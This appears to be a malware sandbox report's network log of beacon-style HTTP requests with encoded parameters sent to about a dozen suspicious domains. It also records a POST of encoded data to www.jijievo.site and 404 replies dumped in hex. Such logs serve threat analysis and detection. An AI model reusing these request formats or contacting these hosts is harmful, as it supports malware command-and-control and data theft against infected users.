                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /ni8v/?u6nP_F48=E6dmM5lVsU5dMvoO4DByNQl1po9CAiKqwP/M9Lkf/Pz1vXYNvQEcepUiklJu8ucCjCBb2PxhMpGrlWRQjEXW3F39dXh33B934veeKulAqM3yo8/KKg/OIuvEV/M85G2BQAfVVnY=&F8S0G=ul80rPhxFlR8lH HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Host: www.aiactor.xyzConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; GT-N7100 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                Source: global trafficHTTP traffic detected: GET /k6jo/?u6nP_F48=g2gBEi9B+HDFGx1wG+72kN8Yj19AUdr4Nr1Jd72ZJlQgpbXPbifaD6lB1zmlmZG8AmkyaCU7LvK0zzlsdiU5EFaXnjyK5oQQkYGW08c3lB7eL51xgHFAptm5WP0FkXlczfO1jHA=&F8S0G=ul80rPhxFlR8lH HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Host: www.jijievo.siteConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; GT-N7100 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                Source: global trafficHTTP traffic detected: GET /odi0/?F8S0G=ul80rPhxFlR8lH&u6nP_F48=A+TCtTOt1m7L0JkN7P72xqDuM3MJ0JKhh3i5FsNa0NmBZ9+GiOsXSm+4Udvcs/rcS+RMYR73IEQXFVaqqwbxWOBmPh+KTHFpnfkytlUBUFCYYxG0fJp40sWrzXdCUwp6RCE3NBU= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Host: www.inspireto.lifeConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; GT-N7100 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                Source: global trafficHTTP traffic detected: GET /ffyl/?u6nP_F48=E0w2q4MWRkFX7XJTCFHtBeMrFLWo0m25Rc1Iug5umE0SqvxIQJbSqlJsxR0jPeALC0qf+EILQRQVRMVyHOYHvE1WYG6fPKkQNyF776m1LEnS8hs9By21ThuVAZMLKVLgjh2k5HE=&F8S0G=ul80rPhxFlR8lH HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Host: www.717hy.netConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; GT-N7100 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                Source: global trafficHTTP traffic detected: GET /7a5n/?F8S0G=ul80rPhxFlR8lH&u6nP_F48=S6SHGGXXYwmAu16pai4DUvmkZVlUR2XiLpaLWC7pZkuSLECp9ozWQ9UIc1yk4ybjQU73M8zKwnu8ByEcz6/kZr88F4N+VuUzEk15V8/AegthLE/UMwpBwzbtc6DqGvxT1O3KEY4= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Host: www.bootleggersrt.onlineConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; GT-N7100 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                Source: global trafficHTTP traffic detected: GET /q2b2/?u6nP_F48=k8LEnfe2wzSPKnd+4j+FHsRof8pP0SbHpdiozyXUU8wG1G+DI2HbB69btAHUx0UZtSY5up0HFKX7joYW5N4IdT0eHsdsbM4tAcjV6Y0GGqKWlvaVbVOKX21NPAfOVONObcqqhCU=&F8S0G=ul80rPhxFlR8lH HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Host: www.lgdiamonds.infoConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; GT-N7100 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                Source: global trafficHTTP traffic detected: GET /plyd/?F8S0G=ul80rPhxFlR8lH&u6nP_F48=dzHZVdeA6r6aBY+WJKlD1JvNcS8At/hTBiY50HAPZV2ofm/GZqXRfQPKYRVLRkTR3sVHjl53Bmiktifh36yAEsVj1orjw3l3xM5ELiir5eYKE6CYAoGwQn3hI9wO6DC6wMKZTnE= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Host: www.funnystory.onlineConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; GT-N7100 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                Source: global trafficHTTP traffic detected: GET /n3sn/?u6nP_F48=RfKXbkttwVfKfWhPTrA3UJfHAa0lqotu1/Ih4u/jCz+IVopDYjbPUryKgNOP1Jh4fKEyHC4SaeJpkkGXoxNgwDh8y8hzLkYWybtZWLt0K3r82a9qd0enmdThBea8SuX4gW/lNzc=&F8S0G=ul80rPhxFlR8lH HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Host: www.614genetics.onlineConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; GT-N7100 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                Source: global trafficHTTP traffic detected: GET /tb3j/?F8S0G=ul80rPhxFlR8lH&u6nP_F48=KSHFFnYTGWj/ZMhm+avBOUk2TTzM3y8YS8Rf4LhuEMPHAxZPTsF4EjHc/8b3mL3nQQOBHU115ds5/08vb05btA7AesMNksIJY0axPJ9FedzLP3Na7bRMzIAWWfH5e2OB5R7SOhY= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Host: www.hm35s.topConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; GT-N7100 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                Source: global trafficHTTP traffic detected: GET /7hhj/?u6nP_F48=d0CkvoX3wOjxIpsVGuv5CbpRWXdSS5jyTLOcAowQzGd7pP90T+NzeFPfjsupmGVcOHZBRLveV16iOhBmsp+LB4tn4np0Uy/CwiS3uOlrNEAyxbwQ0Bx5UgKfq4kfjh/tx9U3UfI=&F8S0G=ul80rPhxFlR8lH HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Host: www.gravendeel.studioConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; GT-N7100 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                Source: global trafficHTTP traffic detected: GET /z5bv/?u6nP_F48=cvqi6aS93HIxTV+im7Da9wWvrF3f6kX831gUtjTv5ZY+kxOTwbTgT7fbXvvVwY5eJbST1YhYPLKkRqd0ELEj3LZc91hb0mGUNuPi7mwbOhhaZQnJVaKvflcbWzyST/JxwAq3b9E=&F8S0G=ul80rPhxFlR8lH HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Host: www.kvsj.netConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; GT-N7100 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                Source: global trafficHTTP traffic detected: GET /8l49/?u6nP_F48=nvcb/0GPN54d2JGc++8p3dyReVT22F4rjpMi4BWXcGVVoAh+NvljRHAQbHtQixLLlmtkfcmDaBBvdXdVxLFdqzx8TquVI3FC1FmB8VJ2JKjVM5x76R9HEtDUYFAgHCOmYLPQQCg=&F8S0G=ul80rPhxFlR8lH HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Host: www.beythome.onlineConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; GT-N7100 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                Source: global trafficDNS traffic detected: DNS query: www.aiactor.xyz
                Source: global trafficDNS traffic detected: DNS query: www.jijievo.site
                Source: global trafficDNS traffic detected: DNS query: www.inspireto.life
                Source: global trafficDNS traffic detected: DNS query: www.717hy.net
                Source: global trafficDNS traffic detected: DNS query: www.bootleggersrt.online
                Source: global trafficDNS traffic detected: DNS query: www.lgdiamonds.info
                Source: global trafficDNS traffic detected: DNS query: www.funnystory.online
                Source: global trafficDNS traffic detected: DNS query: www.614genetics.online
                Source: global trafficDNS traffic detected: DNS query: www.hm35s.top
                Source: global trafficDNS traffic detected: DNS query: www.gravendeel.studio
                Source: global trafficDNS traffic detected: DNS query: www.kvsj.net
                Source: global trafficDNS traffic detected: DNS query: www.beythome.online
                Source: global trafficDNS traffic detected: DNS query: www.theressome123ppl.info
                Source: global trafficDNS traffic detected: DNS query: www.conseilnsaftogo.org
                Source: unknownHTTP traffic detected: POST /k6jo/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.5Host: www.jijievo.siteContent-Length: 213Content-Type: application/x-www-form-urlencodedCache-Control: no-cacheConnection: closeOrigin: http://www.jijievo.siteReferer: http://www.jijievo.site/k6jo/User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; GT-N7100 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30Data Raw: 75 36 6e 50 5f 46 34 38 3d 74 30 49 68 48 53 5a 72 32 33 48 57 4a 77 5a 78 42 2f 4c 6b 31 73 51 59 6d 46 34 34 42 65 69 38 62 61 52 7a 66 34 47 52 4f 6b 30 75 6a 38 66 32 58 31 2b 6f 44 72 5a 39 7a 69 57 30 6b 49 54 57 56 69 38 63 4b 43 6b 59 4f 66 57 65 32 7a 6c 61 55 78 73 42 61 7a 61 33 6a 30 43 69 2f 35 6b 4d 73 65 71 57 32 65 63 39 37 30 58 31 4e 6f 4a 48 75 57 46 66 74 37 65 45 61 4e 6b 53 6c 31 68 43 6b 4e 79 77 71 69 63 74 41 4b 39 70 35 30 63 30 6e 6f 49 73 63 32 38 71 68 52 2b 6e 63 59 48 5a 6b 6b 34 46 76 57 6e 41 4b 69 48 32 39 34 39 33 35 39 49 64 4b 70 2b 78 41 44 46 50 52 39 54 63 78 4f 6c 68 6c 70 47 43 71 53 42 4f Data Ascii: u6nP_F48=t0IhHSZr23HWJwZxB/Lk1sQYmF44Bei8baRzf4GROk0uj8f2X1+oDrZ9ziW0kITWVi8cKCkYOfWe2zlaUxsBaza3j0Ci/5kMseqW2ec970X1NoJHuWFft7eEaNkSl1hCkNywqictAK9p50c0noIsc28qhR+ncYHZkk4FvWnAKiH2949359IdKp+xADFPR9TcxOlhlpGCqSBO
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Dec 2024 13:39:05 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36 30 39 36 22 3e
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Dec 2024 13:39:07 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36 30 39 36 22 3e
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Dec 2024 13:39:10 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36 30 39 36 22 3e
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Dec 2024 13:39:13 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 